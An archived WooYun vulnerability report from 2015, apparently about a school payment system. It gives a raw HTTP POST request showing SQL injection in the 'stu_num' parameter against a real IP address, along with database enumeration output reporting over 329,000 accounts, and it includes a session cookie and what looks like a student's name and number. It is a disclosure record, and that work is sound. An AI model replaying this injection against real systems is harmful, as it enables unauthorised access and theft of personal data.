乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-03: 细节已通知厂商并且等待厂商处理中 2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开
RT
参数stu_num有注入
POST /Charge/GetCharge HTTP/1.1Host: 202.116.65.251Accept-Language: zh-cnUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12D508 MicroMessenger/6.1.4 NetType/WIFIX-Requested-With: XMLHttpRequestAccept: application/json, text/javascript, */*; q=0.01Referer: http://202.116.65.251/Charge/CardCharge/?showwxpaytitle=1&code=03102f1414631e258f35a2e70974a94F&state=1Content-Type: application/x-www-form-urlencoded; charset=UTF-8Connection: keep-aliveCookie: ASP.NET_SessionId=vfjkfqiwztlhg11faosufrg1Proxy-Connection: keep-aliveContent-Length: 124Origin: http://202.116.65.251Accept-Encoding: gzip, deflateuser=%E6%9E%97%E5%BF%97%E6%98%8E&stu_num=033911035&money=100+%E5%85%83&FromSno=&FromName=&tmpId=oF2CkjuMqKbzdJXwBWRxAnjuffyw
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracleavailable databases [13]:[*] DBSNMP[*] EQU[*] FEE[*] OUTLN[*] SCHOOL[*] SCHOOLING[*] SPORTS[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] YWQ
泄露32w账户,具体数据没有跑了。
select count(*) from ACCOUNT: '329153'
过滤
危害等级:无影响厂商忽略
忽略时间:2015-04-13 16:58
漏洞Rank:4 (WooYun评价)
暂无